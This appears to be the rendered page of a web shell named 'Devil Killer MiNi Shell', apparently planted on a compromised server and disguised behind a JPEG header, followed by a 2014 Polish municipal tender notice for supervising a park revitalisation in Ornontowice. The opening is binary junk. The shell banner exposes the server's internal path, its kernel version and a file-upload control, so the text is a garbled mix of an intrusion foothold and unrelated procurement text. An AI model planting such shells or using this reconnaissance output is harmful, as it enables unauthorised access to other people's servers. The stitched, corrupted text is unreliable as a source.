JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140627/216002-N-2014.html

<p class="kh_header"><b>Ornontowice: Pełnienie kompleksowego nadzoru inwestorskiego dla inwestycji pn.: Rewitalizacja obiektu - Park Gminny  w Ornontowicach, realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet VI. Zrównoważony rozwój miast Działanie 6.2. Rewitalizacja obszarów zdegradowanych Poddziałanie 6.2.2. Rewitalizacja - małe miasta.</b><br>
<b>Numer ogłoszenia: 216002 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ornontowice , ul. Zwycięstwa 26a, 43-178 Ornontowice, woj. śląskie, tel. 32 3306222, faks 32 3306215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.ornontowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie kompleksowego nadzoru inwestorskiego dla inwestycji pn.: Rewitalizacja obiektu - Park Gminny  w Ornontowicach, realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet VI. Zrównoważony rozwój miast Działanie 6.2. Rewitalizacja obszarów zdegradowanych Poddziałanie 6.2.2. Rewitalizacja - małe miasta..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Pełnienie kompleksowego nadzoru inwestorskiego dla inwestycji pn.: Rewitalizacja obiektu - Park Gminny w Ornontowicach, realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet VI. Zrównoważony rozwój miast Działanie 6.2. Rewitalizacja obszarów zdegradowanych Poddziałanie 6.2.2. Rewitalizacja - małe miasta.
1. Zakres prac obejmuje:
a) Kompleksowy nadzór inwestorski w zakresie robót budowlanych przy zabytku wpisanym do rejestru, robót drogowych oraz robót elektrycznych.
2. Zakres obowiązków Inspektora Nadzoru obejmuje:Obowiązki inspektora nadzoru w okresie poprzedzającym realizację budowy:a) Inspektor nadzoru powinien zapoznać się z dokumentacją projektową, sprawdzić jej kompletność pod kątem realizacyjnym oraz ujętych przedmiarów robót,b) Inspektor nadzoru powinien dokonać oględzin terenu budowy z analizą jego uzbrojenia i urządzeń oraz oceny potencjalnych zagrożeń związanych z realizacją przedsięwzięcia. 
2.2 Obowiązki inspektora nadzoru w okresie realizacji budowy: a) Inspektor nadzoru w czasie trwania budowy sprawuje kontrolę nad jej przebiegiem w zakresie niezbędnym do zabezpieczenia interesów Zamawiającego i przyszłych użytkowników,b) Do podstawowych obowiązków inspektora nadzoru inwestorskiego należy:- reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej,- sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,- kontrola terminowości robót,
- sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających (łącznie z wpisem do Dziennika Budowy), uczestniczenie w próbach i odbiorach technicznych instalacji, - potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,- uczestniczenie w naradach organizowanych przez Inwestora.c) Inspektor nadzoru inwestorskiego będzie brał udział w naradach roboczych na budowie, tzw. Radach Budowy, które Zamawiający organizował będzie z częstotliwością uzależnioną od postępu robót, jednak nie rzadziej niż raz w tygodniu (za wyjątkiem sytuacji szczególnie uzasadnionych). Na każde spotkanie inspektor będzie przygotowywał pisemny protokół z postępu prac. d) Inspektor nadzoru inwestorskiego w porozumieniu z kierownikiem budowy rozstrzyga wątpliwości natury technicznej powstałe w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu.
e) Inspektor nadzoru inwestorskiego może żądać dokonania przez wykonawcę robót, na jego koszt odkrywek elementów robót budzących wątpliwości w celu sprawdzenia jakości ich wykonania, jeżeli wykonanie tych robót nie zostało zgłoszone do sprawdzenia przed ich zakryciem.f) Inspektor nadzoru inwestorskiego ma obowiązek sprawdzenia i potwierdzenia wykonania określonych w umowie etapów inwestycji, obiektów lub ich części nie stanowiących odrębnych przedmiotów odbioru w zakresie, w jakim zgodnie z umową mogą one być przedmiotem oddzielonego fakturowania.g) Inspektor nadzoru inwestorskiego ma obowiązek stwierdzenia aktualnego stanu robót w razie przerwy w robotach oraz w innych wypadkach, gdy zachodzi potrzeba ustalenia ilości, jakości i wartości robót w zakresie niezbędnym do rozliczeń z Zamawiającym.2.3 Obowiązki inspektora nadzoru związane z odbiorem obiektu lub robót:a) Inspektor nadzoru sprawdza kompletność przedstawionych przez wykonawcę robót dokumentów i zaświadczeń niezbędnych do przeprowadzenia odbioru, b) Inspektor nadzoru jest zobowiązany do uczestniczenia w czynnościach odbioru częściowego i końcowego  i przekazywaniu obiektu użytkownikowi,c) Inspektor nadzoru jest zobowiązany do sprawdzenia dokumentacji powykonawczej budowy.2.4 Obowiązki inspektora nadzoru w okresie gwarancji, rękojmi: a) Inspektor nadzoru bierze udział w komisjach powoływanych do stwierdzenia ujawnionych wad,b) Inspektor nadzoru kontroluje usunięcie wad przez wykonawcę robót.3. Opis przedmiotu zamówienia: Szczegółowe właściwości funkcjonalne: Powierzchnia parku ok. - 4,2ha. Powierzchnia w zakresie opracowania podzielona na etapy - łącznie ok. 2,63ha UWAGA! Wszelkie prace na terenie parku podlegają szczegółowym uzgodnieniom z konserwatorem zabytków.Zadanie zostało podzielone na 4 etapy, z których każdy obejmuje:ETAP II obejmuje:1. Amfiteatr do celu organizowania wydarzeń kulturalnych - widownia stanowiąca wycinek koła, z rzędami ławek   w odcinkach łamanych oraz dwoma zejściami dla widzów.
Stała zadaszona scena w formie muszli koncertowej -   scena o trapezowym obrysie rzutu, przykryta zadaszeniem   w formie fragmentu bocznicy stożka, wysokość od poziomu terenu do szczytu - 10 m,Zaplecze, które obejmuje: korytarz, magazyn podręczny, 2 garderoby oraz 2 pomieszczenia WC. Budynek zaplecza na tyłach sceny o prostokątnym obrysie rzutu, wydłużonym kierunku północ - południe, jednokondygnacyjny, niepodpiwniczony, ze stropodachem płaskim,Obiekt zostanie wyposażony w wszelką infrastrukturę niezbędną do prawidłowego funkcjonowania (prąd, woda, Internet). Powierzchnia zabudowy zaplecza: ok. 71 m 2.2. Nawierzchnie pozostałe - teren przeznaczony na budowę drogi pożarowej z placem manewrowym i alejką dla ruchu konnego.
Prace ziemne należy wykonywać ze szczególnym zwróceniem uwagi na bezpieczeństwo korzeni drzew rosnących  w pobliżu.Korytowanie pod wszystkie nawierzchnie ok. 40cm - 2252m 2.Wykonanie pochylni na drodze pożarowej 126m2 - 110m 3.Skarpa pod widownię - 620m 3.Złagodzenie skarpy przy parku i podniesienie wypłaszczenia 156+701 - 857m 3.Podbudowy pod nawierzchnie, nawierzchnie (kamień/kostka granitowa) + krawężnik/obrzeże granitowy surowo łupany wraz z podbudową:Podbudowa górna, dolna oraz warstwa odsączająca - 2252m 2.Wykonanie nawierzchni Terraway - 400m2 . 
Wykonanie nawierzchni utwardzonej (kamień naturalny) - 622m 2.Nawierzchnia alejek (kamienna) - 262m 2.Nawierzchnia dla drogi pożarowej (kamienna) - 823m 2.Nawierzchnia dla ruchu konnego - 145m 2.
3. Nasadzenia - obejmują drzewa, krzewy, a także byliny i rośliny cebulowe oraz trawnik. ETAP III obejmuje:1. Plac zabaw z labiryntem. Wszystkie wybrane elementy placu zabaw są zbudowane prawie całkowicie z drewna, w celu jak najlepszego dopasowania do naturalistycznego stylu całego parku. Wszystkie urządzenia zabawowe powinny posiadać atesty, certyfikaty oraz spełniać wszystkie niezbędne wymogi bezpieczeństwa. Zostaną wykonane w standardowych rozmiarach dla poszczególnych grup wiekowych, zgodnie z danymi katalogowymi (wybór zabawek zostanie uzgodniony z Inwestorem). Urządzenia zabawowe powinny spełniać wymogi norm PN-EN 1176-1-11:2009P Wyposażenie placów zabaw i nawierzchnie, natomiast nawierzchnie powinny spełniać wymagania normy PN-EN 1177:2009P Nawierzchnie placów zabaw amortyzujące upadki. Nawierzchnie zastosowane na placu zabaw powinny być wykonane częściowo z piasku a częściowo jako nawierzchnia bezpieczna syntetyczna. Zestaw elementów na placu zabaw będzie przystosowany dla dzieci w różnych kategoriach wiekowych. Funkcja terenu zostaje urozmaicona poprzez lokalizację placów zabaw: dla dzieci najmłodszych, dzieci starszych, terenu do gier planszowych.2. Plac Aniołów Stróżów. Na wzniesieniu położonym blisko wejścia do parku od strony północno-zachodniej zostanie ustawiona rzeźba Anioła Stróża wykonanego z drewna, zwróconego twarzą w stronę placu zabaw. Minimalna wysokość postaci Anioła Stróża to 2,5m. Postać  Anioła  otoczono zielenią. 3. Nawierzchnie pozostałe obejmują wykonanie nawierzchni bezpiecznej wraz z podbudową i krawężnikiem gumowym na placu zabaw, kamienia łamanego na Placu Aniołów Stróżów oraz kostki granitowej jako nawierzchni labiryntu.Roboty ziemne z przemieszczaniem mas ziemnych:
Korytowanie pod wszystkimi nawierzchniami utwardzonymi ok.30cm - 1095m 2.Podbudowy pod nawierzchnie, nawierzchnie + krawężnik granitowy surowo łupany wraz z podbudową:Podbudowa górna, dolna, warstwa odsączająca - 1095m 2.Nawierzchnia bezpieczna syntetyczna - 45m2 . Nawierzchnia bezpieczna - piasek - 480mb.Nawierzchnia na placu Anioła Stróża (kamień łamany) - 42m2 .Nawierzchnia labiryntu - 80mb.
Schody terenowe o dł. biegu 8,2m, szer. biegu 2m - 20m 2. Nawierzchnia alei głównej (kamienna) wraz z krawężnikiem/obrzeżem granitowym - 388m2 . 
Nawierzchnia pozostałych alejek (kamienna) wraz z krawężnikiem/obrzeżem granitowym - 520m 2.4. Nasadzenia - obejmują drzewa, krzewy, a także byliny i rośliny cebulowe oraz trawnik.ETAP IV obejmuje:1. Grill terenowy stacjonarny. W części północno-wschodniej parku zlokalizowano miejsce do organizowania grilli. Prowadzi do niego ścieżka żwirowa, a plac na którym umiejscowiony zostanie grill stacjonarny zostanie wyłożony brukiem. Grill okrągły o min. średnicy zewnętrznej 1.5m.2. Nasadzenia - obejmują drzewa, krzewy, a także byliny i rośliny cebulowe oraz trawnik. 3. Nawierzchnie pozostałe. Roboty ziemne z przemieszczaniem mas ziemnych: Korytowanie pod wszystkie nawierzchnie ok. 30 cm - 815 m2. Podbudowy pod nawierzchnie, nawierzchnie (kamień/kostka granitowa) + krawężnik/obrzeże granitowy surowo łupany wraz z podbudową:Podbudowa górna, dolna, warstwa odsączająca - 815 m2 Nawierzchnia do jazdy konnej i prowadząca do grilla - 485 m2 Nawierzchnia utwardzona (kamienna) - 246 m2 
Wykonanie pochylni - 44m2 Utwardzenie placu na grill wraz z podbudową - 40 m2 4. Ogrodzenie.Jednym z elementów przedmiotowego zadania jest ogrodzenie terenu parku od północno-wschodniej strony ogrodzeniem systemowym panelowym, zabezpieczonym antykorozyjnie  poprzez  m.in.  ocynkowanie  oraz  malowanie proszkowe lakierem.  Ogrodzenie zostanie wykonane od  narożnika ogrodzenia oczyszczalni ścieków sąsiadującej z parkiem do narożnika muru otaczającego stary cmentarz na długości 160 m.
ETAP V obejmuje:1. Budowa oświetlenia Parku Gminnego w Ornontowicach. 
Zadanie obejmuje demontaż istniejącego oświetlenia i sieci oraz budowę nowego oświetlenia Parku Gminnego - ilość słupów wraz z oprawami i lampami sodowymi = 40 szt. słupów oświetleniowych wraz z oprawami ARIES 04 70W.
Słupy będą posadowione wzdłuż chodników - alejek parkowych. W przypadku kolizji z istniejącymi konarami drzew słupy należy przesunąć poza ich konary. 
Ponadto zostanie wykonane oświetlenie dekoracyjne eksponujące niektóre okazy drzew oraz potoku przy projektowanym amfiteatrze wraz ze sceną i zapleczem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.40.00-0, 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie: a) co najmniej 1 usługę polegającą na pełnieniu obowiązków inspektora  nadzoru inwestorskiego, inżyniera kontraktu lub inżyniera rezydenta w zakresie  robót budowlanych przy  zabytku wpisanym do rejestru.b)  co najmniej 1 usługę polegające na pełnieniu obowiązków inspektora nadzoru  inwestorskiego, inżyniera kontraktu lub inżyniera rezydenta w zakresie robót drogowych.c) co najmniej 1 usługę polegające na pełnieniu obowiązków inspektora nadzoru inwestorskiego, inżyniera kontraktu lub inżyniera rezydenta w zakresie robót elektrycznych.W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą:- wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie.
-  dowody dotyczące głównych usług wymienionych w wykazie,  określające,  że  usługi wykazane w wykazie zostały wykonane lub są wykonywane należycie,Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu, Zamawiający oceniał będzie na podstawie wymaganych oświadczeń i dokumentów. Ocena spełniania warunków dokonywana będzie  na zasadzie  spełnia - nie spełnia. Nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać, że dysponuje lub  będzie dysponował osobami zdolnymi do wykonania niniejszego zamówienia, posiadającymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie tj. odpowiednie uprawnienia budowlane w zakresie kierowania robotami budowlanymi odpowiednio w specjalności: budowlanej przy zabytku wpisanym do rejestru; drogowej; elektrycznej. lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej  obowiązujących przepisów oraz  zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000r.  o samorządach zawodowych architektów, inżynierów budowlanych oraz urbanistów (Dz. U. z 2013r. poz. 932 ).
lub spełniającymi warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994r.  Prawo budowlane (tekst jednolity Dz. U. z 2013r. poz. 1409 z późniejszymi zmianami) tj. osoby których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych  lub spełniającymi wymogi o których mowa w art 20a ustawy  z dnia 15.12.2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (świadczenie usług transgranicznych).Zamawiający dopuszcza łączenie w/w funkcji.W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją na temat ich kwalifikacji zawodowych niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami -  zgodnie z załącznikiem  nr 5 do SIWZ.b) oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - zgodnie z załącznikiem nr 5 do SIWZ.Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu, Zamawiający oceniał będzie na podstawie wymaganych oświadczeń i dokumentów. Ocena spełniania warunków dokonywana będzie  na zasadzie  spełnia - nie spełnia. Nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Przez główne usługi należy rozumieć usługi w przedmiocie ( zakresie) i liczbie wystarczającej do potwierdzenia spełniania opisanego wyżej warunku.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń-na formularzu oferty - zgodnie z załącznikiem nr 1 do SIWZ.
2. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.3.W zakresie warunków udziału w postępowaniu opisanych w SIWZ, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie takie należy złożyć  w oryginale lub kopii poświadczonej za zgodność z oryginałem notarialnie  lub kopii poświadczonej za zgodność  z oryginałem przez podmiot udostępniający zasoby.
4.Jeżeli Wykonawca, wykazując spełnianie warunków, opisanych w  SIWZ, polega na zasobach innych podmiotów, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
a) zakresu dostępnych wykonawcy zasobów innego podmiotu;
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
c) charakteru stosunku jaki będzie łączył Wykonawcę z innym podmiotem;
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
